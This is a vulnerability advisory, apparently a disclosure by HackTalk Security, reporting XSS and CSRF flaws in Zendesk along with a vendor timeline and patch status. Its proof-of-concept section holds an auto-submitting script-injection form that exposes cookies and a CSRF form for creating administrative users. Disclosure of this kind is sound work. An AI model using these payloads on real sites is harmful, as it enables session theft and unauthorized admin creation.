/¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯\
:Zendesk Multiple Vulnerabilities :
\________________________________/
/Discovered By: \
|Luis Santana |
\________________________________/
Overview
~_¯~_¯~_¯~_¯~_¯~_¯~_¯~_¯~_¯~_¯~
Luis Santana of the HackTalk Security team has found multiple vulnerabilities in Zendesk.
Product Information
~_¯~_¯~_¯~_¯~_¯~_¯~_¯~_¯~_¯~_¯~
Product/Script: Zendesk
Affected Version:
Vulnerability Type: Multiple
Security Risk: Multiple
Vendor URL: http://zendesk.com
Product/Script Demo:
Vendor Status: Notified
Patch/Fix Status: Patches Made
Advisory Timeline: July 31st 9:34am EST - Zendesk Contacted about XSS
July 31st 12:42pm EST - Ticket passed to Security Department
July 31st 10:46pm EST - Zendesk has started producing patch. Given the go ahead to publicly disclose
July 31st 1:00am EST - Found CSRF, continuing investigation
August 1st 3:49pm EST - CSRF Patch in production
August 4th 3:51am EST - CSRF patch being rolled out
August 10th 3:36pm EST - Given the ok to post advisory publicly
Advisory URL: http://hacktalk.net/exploit/exploit.php?n=10
Product Description
~_¯~_¯~_¯~_¯~_¯~_¯~_¯~_¯~_¯~_¯~
Web-based customer support software with elegant ticket mnagement and a self-service customer community platform. Agile, smart and convenient.
(From http://www.zendesk.com)
Vulnerability Details
~_¯~_¯~_¯~_¯~_¯~_¯~_¯~_¯~_¯~_¯~
XSS -
The email address field of the anonymous_requests page is vulnerable to XSS due to lack of input sanitation. By crafting a malcious POST request an attacker is able to inject HTML, Javascript or AJAX into the anonymous_requests page.
CSRF -
Due to a lack of input sanitation many forms are vulnerable to CSRF. The most notable example is the new user creation form which allows an attacker to create a new administrative user.
Proof of Concept
~_¯~_¯~_¯~_¯~_¯~_¯~_¯~_¯~_¯~_¯~
XSS -
<html>
<head></head>
<body>
<form method="POST" action="https://site.com/anonymous_requests"name="explForm">
<input type=hidden name=email value='"><script>alert("I could have just stolen your cookie" + document.cookie);</script>'
</form>
<script language="Javascript">
setTimeout('explForm.submit()', 1000 * 1);
</script>
</body>
CSRF -
<form action="http://site.com/users" class="new_user" enctype="multipart/form-data" id="user-form" method="post" name="userform" onsubmit="return submitUser()">
<input id="ignore-upload-user" name="ignoreupload" type="hidden" value="0" />
<h2>Name <span class="sub">Display name used throughout the help desk.</span></h2>
<input id="user_name" name="user[name]" size="30" type="text" />
<!--<p>Display name used throughout the help desk.</p>-->
<h3>
Email
<span class="sub">Used when logging in.</span>
</h3>
<input id="user_email" name="user[email]" size="30" type="text" />
<h3>
Twitter account
</h3>
<input id="user_new_twitter_identity" name="user[new_twitter_identity]" size="30" type="text" />
<h3>Phone number <span class="sub">Optional.</span></h3>
<input id="user_phone" name="user[phone]" size="30" type="text" />
<h3>Time zone</h3>
<select id="user_time_zone" name="user[time_zone]"><option value="International Date Line West">(GMT-11:00) International Date Line West</option>
<option value="Midway Island">(GMT-11:00) Midway Island</option>
<option value="Samoa">(GMT-11:00) Samoa</option>
<option value="Hawaii">(GMT-10:00) Hawaii</option>
<option value="Alaska">(GMT-09:00) Alaska</option>
<option value="Pacific Time (US & Canada)">(GMT-08:00) Pacific Time (US & Canada)</option>
<option value="Tijuana">(GMT-08:00) Tijuana</option>
<option value="Arizona">(GMT-07:00) Arizona</option>
<option value="Chihuahua">(GMT-07:00) Chihuahua</option>
<option value="Mazatlan">(GMT-07:00) Mazatlan</option>
<option value="Mountain Time (US & Canada)">(GMT-07:00) Mountain Time (US & Canada)</option>
<option value="Central America">(GMT-06:00) Central America</option>
<option value="Central Time (US & Canada)">(GMT-06:00) Central Time (US & Canada)</option>
<option value="Guadalajara">(GMT-06:00) Guadalajara</option>
<option value="Mexico City">(GMT-06:00) Mexico City</option>
<option value="Monterrey">(GMT-06:00) Monterrey</option>
<option value="Saskatchewan">(GMT-06:00) Saskatchewan</option>
<option value="Bogota" selected="selected">(GMT-05:00) Bogota</option>
<option value="Eastern Time (US & Canada)">(GMT-05:00) Eastern Time (US & Canada)</option>
<option value="Indiana (East)">(GMT-05:00) Indiana (East)</option>
<option value="Lima">(GMT-05:00) Lima</option>
<option value="Quito">(GMT-05:00) Quito</option>
<option value="Caracas">(GMT-04:30) Caracas</option>
<option value="Atlantic Time (Canada)">(GMT-04:00) Atlantic Time (Canada)</option>
<option value="La Paz">(GMT-04:00) La Paz</option>
<option value="Santiago">(GMT-04:00) Santiago</option>
<option value="Newfoundland">(GMT-03:30) Newfoundland</option>
<option value="Brasilia">(GMT-03:00) Brasilia</option>
<option value="Buenos Aires">(GMT-03:00) Buenos Aires</option>
<option value="Georgetown">(GMT-03:00) Georgetown</option>
<option value="Greenland">(GMT-03:00) Greenland</option>
<option value="Mid-Atlantic">(GMT-02:00) Mid-Atlantic</option>
<option value="Azores">(GMT-01:00) Azores</option>
<option value="Cape Verde Is.">(GMT-01:00) Cape Verde Is.</option>
<option value="Casablanca">(GMT+00:00) Casablanca</option>
<option value="Dublin">(GMT+00:00) Dublin</option>
<option value="Edinburgh">(GMT+00:00) Edinburgh</option>
<option value="Lisbon">(GMT+00:00) Lisbon</option>
<option value="London">(GMT+00:00) London</option>
<option value="Monrovia">(GMT+00:00) Monrovia</option>
<option value="UTC">(GMT+00:00) UTC</option>
<option value="Amsterdam">(GMT+01:00) Amsterdam</option>
<option value="Belgrade">(GMT+01:00) Belgrade</option>
<option value="Berlin">(GMT+01:00) Berlin</option>
<option value="Bern">(GMT+01:00) Bern</option>
<option value="Bratislava">(GMT+01:00) Bratislava</option>
<option value="Brussels">(GMT+01:00) Brussels</option>
<option value="Budapest">(GMT+01:00) Budapest</option>
<option value="Copenhagen">(GMT+01:00) Copenhagen</option>
<option value="Ljubljana">(GMT+01:00) Ljubljana</option>
<option value="Madrid">(GMT+01:00) Madrid</option>
<option value="Paris">(GMT+01:00) Paris</option>
<option value="Prague">(GMT+01:00) Prague</option>
<option value="Rome">(GMT+01:00) Rome</option>
<option value="Sarajevo">(GMT+01:00) Sarajevo</option>
<option value="Skopje">(GMT+01:00) Skopje</option>
<option value="Stockholm">(GMT+01:00) Stockholm</option>
<option value="Vienna">(GMT+01:00) Vienna</option>
<option value="Warsaw">(GMT+01:00) Warsaw</option>
<option value="West Central Africa">(GMT+01:00) West Central Africa</option>
<option value="Zagreb">(GMT+01:00) Zagreb</option>
<option value="Athens">(GMT+02:00) Athens</option>
<option value="Bucharest">(GMT+02:00) Bucharest</option>
<option value="Cairo">(GMT+02:00) Cairo</option>
<option value="Harare">(GMT+02:00) Harare</option>
<option value="Helsinki">(GMT+02:00) Helsinki</option>
<option value="Istanbul">(GMT+02:00) Istanbul</option>
<option value="Jerusalem">(GMT+02:00) Jerusalem</option>
<option value="Kyev">(GMT+02:00) Kyev</option>
<option value="Minsk">(GMT+02:00) Minsk</option>
<option value="Pretoria">(GMT+02:00) Pretoria</option>
<option value="Riga">(GMT+02:00) Riga</option>
<option value="Sofia">(GMT+02:00) Sofia</option>
<option value="Tallinn">(GMT+02:00) Tallinn</option>
<option value="Vilnius">(GMT+02:00) Vilnius</option>
<option value="Baghdad">(GMT+03:00) Baghdad</option>
<option value="Kuwait">(GMT+03:00) Kuwait</option>
<option value="Moscow">(GMT+03:00) Moscow</option>
<option value="Nairobi">(GMT+03:00) Nairobi</option>
<option value="Riyadh">(GMT+03:00) Riyadh</option>
<option value="St. Petersburg">(GMT+03:00) St. Petersburg</option>
<option value="Volgograd">(GMT+03:00) Volgograd</option>
<option value="Tehran">(GMT+03:30) Tehran</option>
<option value="Abu Dhabi">(GMT+04:00) Abu Dhabi</option>
<option value="Baku">(GMT+04:00) Baku</option>
<option value="Muscat">(GMT+04:00) Muscat</option>
<option value="Tbilisi">(GMT+04:00) Tbilisi</option>
<option value="Yerevan">(GMT+04:00) Yerevan</option>
<option value="Kabul">(GMT+04:30) Kabul</option>
<option value="Ekaterinburg">(GMT+05:00) Ekaterinburg</option>
<option value="Islamabad">(GMT+05:00) Islamabad</option>
<option value="Karachi">(GMT+05:00) Karachi</option>
<option value="Tashkent">(GMT+05:00) Tashkent</option>
<option value="Chennai">(GMT+05:30) Chennai</option>
<option value="Kolkata">(GMT+05:30) Kolkata</option>
<option value="Mumbai">(GMT+05:30) Mumbai</option>
<option value="New Delhi">(GMT+05:30) New Delhi</option>
<option value="Sri Jayawardenepura">(GMT+05:30) Sri Jayawardenepura</option>
<option value="Kathmandu">(GMT+05:45) Kathmandu</option>
<option value="Almaty">(GMT+06:00) Almaty</option>
<option value="Astana">(GMT+06:00) Astana</option>
<option value="Dhaka">(GMT+06:00) Dhaka</option>
<option value="Novosibirsk">(GMT+06:00) Novosibirsk</option>
<option value="Rangoon">(GMT+06:30) Rangoon</option>
<option value="Bangkok">(GMT+07:00) Bangkok</option>
<option value="Hanoi">(GMT+07:00) Hanoi</option>
<option value="Jakarta">(GMT+07:00) Jakarta</option>
<option value="Krasnoyarsk">(GMT+07:00) Krasnoyarsk</option>
<option value="Beijing">(GMT+08:00) Beijing</option>
<option value="Chongqing">(GMT+08:00) Chongqing</option>
<option value="Hong Kong">(GMT+08:00) Hong Kong</option>
<option value="Irkutsk">(GMT+08:00) Irkutsk</option>
<option value="Kuala Lumpur">(GMT+08:00) Kuala Lumpur</option>
<option value="Perth">(GMT+08:00) Perth</option>
<option value="Singapore">(GMT+08:00) Singapore</option>
<option value="Taipei">(GMT+08:00) Taipei</option>
<option value="Ulaan Bataar">(GMT+08:00) Ulaan Bataar</option>
<option value="Urumqi">(GMT+08:00) Urumqi</option>
<option value="Osaka">(GMT+09:00) Osaka</option>
<option value="Sapporo">(GMT+09:00) Sapporo</option>
<option value="Seoul">(GMT+09:00) Seoul</option>
<option value="Tokyo">(GMT+09:00) Tokyo</option>
<option value="Yakutsk">(GMT+09:00) Yakutsk</option>
<option value="Adelaide">(GMT+09:30) Adelaide</option>
<option value="Darwin">(GMT+09:30) Darwin</option>
<option value="Brisbane">(GMT+10:00) Brisbane</option>
<option value="Canberra">(GMT+10:00) Canberra</option>
<option value="Guam">(GMT+10:00) Guam</option>
<option value="Hobart">(GMT+10:00) Hobart</option>
<option value="Melbourne">(GMT+10:00) Melbourne</option>
<option value="Port Moresby">(GMT+10:00) Port Moresby</option>
<option value="Sydney">(GMT+10:00) Sydney</option>
<option value="Vladivostok">(GMT+10:00) Vladivostok</option>
<option value="Magadan">(GMT+11:00) Magadan</option>
<option value="New Caledonia">(GMT+11:00) New Caledonia</option>
<option value="Solomon Is.">(GMT+11:00) Solomon Is.</option>
<option value="Auckland">(GMT+12:00) Auckland</option>
<option value="Fiji">(GMT+12:00) Fiji</option>
<option value="Kamchatka">(GMT+12:00) Kamchatka</option>
<option value="Marshall Is.">(GMT+12:00) Marshall Is.</option>
<option value="Wellington">(GMT+12:00) Wellington</option>
<option value="Nuku'alofa">(GMT+13:00) Nuku'alofa</option><option value="" disabled="disabled">-------------</option>
</select>
<a name="photo">
<h3>Photo <span class="sub">An optional smiling face. For the best results, upload a photo with equal length and height.</span></h3>
<input id="photo_uploaded_data" name="photo[uploaded_data]" type="file" />
</a>
<h3>Detailed information</h3>
<textarea cols="60" id="user_details" name="user[details]" rows="5"></textarea>
<p>Optional detailed information concerning this user, e.g. an address. This information is visible to agents only, never to end-users.</p>
<h3>Notes</h3>
<textarea cols="60" id="user_notes" name="user[notes]" rows="5"></textarea>
<p>Optional notes concerning this user. Notes can also be added/edited for a requester directly on the ticket form page.<br/>Notes are visible to agents only, never to any end-user.</p>
<div id="organization-block">
<h3>Organization</h3>
<select id="user_organization_id" name="user[organization_id]" style="width:auto;"><option value="">(None)</option>
<option value="237057">HackTalk Security</option></select>
<p>Leave blank to select default organization according to organization mappings.</p>
</div>
<h3>Role - privileges granted to this user</h3>
<h4>
<input checked="checked" id="user-radio" name="user[roles]" onclick="checkAgent();" type="radio" value="0" />
End-user.
<span class="sub">Submits support tickets to the help desk.</span>
</h4>
<div id="end_user_block" class="indented_option" style="">
<h4>Has access to:</h4>
<p><input checked="checked" id="user_restriction_id_4" name="user[restriction_id]" type="radio" value="4" /> Tickets requested by user only</p>
<p><input id="user_restriction_id_2" name="user[restriction_id]" type="radio" value="2" /> Tickets from user's organization</p>
<p>Note - if the user belongs to a shared organization, then the user always has access to tickets in the organization.</p>
</div>
<h4>
<input id="user_roles_4" name="user[roles]" onclick="checkAgent();" type="radio" value="4" />
Agent.
<span class="sub">Help desk operator. Receives and resolves tickets from end-users.</span>
</h4>
<div id="agent_block" class="indented_option" style="display:none;">
<div id="agent_groups"></div>
<h4>Has access to:</h4>
<p><input id="user_restriction_id_0" name="user[restriction_id]" type="radio" value="0" /> All tickets <span class="sub">(can also add, modify and assume end-users)</span></p>
<p>
<input type="radio" value="2" name="user[restriction_id]" id="snov"/>
Tickets requested by users in this agent's organization <span class="sub">(also can't see forums restricted to other organizations)</span>
</p>
<p><input id="user_restriction_id_3" name="user[restriction_id]" type="radio" value="3" /> Tickets assigned to this agent only</p>
<h4>Can add ticket comments that are:</h4>
<p>
<label class="option"><input checked="checked" class="radio" id="user_is_private_comments_only_false" name="user[is_private_comments_only]" type="radio" value="false" /> Public or private</label>
<label class="option"><input class="radio" id="user_is_private_comments_only_true" name="user[is_private_comments_only]" type="radio" value="true" /> Private only (viewable only by other agents)</label>
</p>
<h4>Can moderate (edit, delete and reorder) topics in forums:</h4>
<p>
<label class="option"><input class="radio" id="user_is_moderator_true" name="user[is_moderator]" type="radio" value="true" /> Yes</label>
<label class="option"><input checked="checked" class="radio" id="user_is_moderator_false" name="user[is_moderator]" type="radio" value="false" /> No</label>
</p>
</div>
<h4>
<input id="user_roles_2" name="user[roles]" onclick="checkAgent();" type="radio" value="2" />
Admin.
<span class="sub">Manages the help desk with regard to rules, users, organizations, groups and SLA's. Has access to all tickets.</span>
<div id="admin_groups" class="indented_option"></div>
</h4>
<div class="action">
<input class="buttonsubmit" id="submit-button" name="commit" type="submit" value="Create" />
</div>
Patch/Fix Suggestion(s)
~_¯~_¯~_¯~_¯~_¯~_¯~_¯~_¯~_¯~_¯~
Upgrade to the latest version of Zendesk as they have released patches for these vulnerabilities.
Security Risk
~_¯~_¯~_¯~_¯~_¯~_¯~_¯~_¯~_¯~_¯~
XSS - Low
CSRF - Mid
Author:
~_¯~_¯~_¯~_¯~_¯~_¯~_¯~_¯~_¯~_¯~
The Author and Researcher of this Advisory is Luis Santana of the HackTalk Security Team